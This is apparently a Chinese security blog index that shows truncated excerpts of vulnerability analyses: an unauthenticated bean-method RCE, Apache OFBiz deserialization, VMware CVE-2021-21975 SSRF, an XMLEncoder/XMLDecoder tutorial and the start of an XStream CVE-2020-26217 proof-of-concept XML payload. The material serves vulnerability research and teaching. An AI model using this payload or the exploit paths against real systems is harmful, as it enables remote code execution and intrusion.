ghtwf01

漏洞概述该漏洞允许未经身份认证的用户调用任意Bean里的任意方法，当调用一个恶意方法时会导致任意代码执行。漏洞分析调用任意Bean里面任意方法漏洞触发点位于servicesProxygenController#invokeService可以看到我们传入的beanIdOrClassName和methodName以及从请求包提取的body被当作参数传入invokeService方法这里通过getBean获取到Bean，接着获取这个Bean里面的所有方法存入数组var8，var7保存数组var8的长度。接下来进入循环，遍历Bean里面每一个方法，当遍历到的方法为传入的methodName时，获取body里面键为methodInput的值作为方法的参数放入变量methodInput，最后调用invoke方法。这样也就成功通过反射调用了我们指定的Bean里面指定的方法。寻找可利用的Bean这里找到的

影响版本Apache OFBiz < 17.12.07环境搭建这里使用Apache OFBiz 17.12.06、jdk8u202搭建环境，配置如下然后编译即可编译完成后会生成一个build目录然后配置JAR Application这里的jre版本是OFBiz运行版本，上面的8u202是Gradle编译时用的版本漏洞分析diff如下可以看到这里新增了黑名单DEFAULT_DENYLIST，内容为rmi和<，猜测可能是处理数据时出现的安全问题。和CVE-2021-26295一样，在framework\webapp\src\main\java\org\apache\ofbiz\webapp\event\SOAPEventHandler.java#invoke开始跟进SoapSerializer#deserialize跟进XmlSerializer#deserialize跟进Xmls

CVE-2021-21975漏洞复现漏洞分析位于casa/WEB-INF/classes/com/vmware/ops/casa/api/ClusterDefinitionController.class有一个路由/nodes/thumbprints这里接收POST传入的值作为address传入getNodesThumbprints方法，跟进ClusterDefinitionService#getNodesThumbprints这里实例化了一个HttpMapFunction类并调用了execute方法，可以看到返回的结果保存在response中，后面就是对返回结果的处理，从变量名和后面操作的行为就可以猜测execute方法里面就是发出请求也就是造成ssrf的地方，跟进看一看这里的hosts也就是我们传入的address转为数组的形式，接着将hosts赋值给var4，然后进入for循环遍历h

XMLEncoder&XMLDecoderXMLDecoder/XMLEncoder 是在JDK1.4版中添加的 XML 格式序列化持久性方案，使用 XMLEncoder 来生成表示 JavaBeans 组件(bean)的 XML 文档，用 XMLDecoder 读取使用 XMLEncoder 创建的XML文档获取JavaBeans。XMLEncoder例子代码如下package ghtwf01.demo; import javax.swing.*; import java.beans.XMLEncoder; import java.io.BufferedOutputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; public class XmlEncoder { pu

影响范围Xstream <= 1.4.14CVE-2020-26217漏洞复现poc:<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'> <dataHandler> <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlD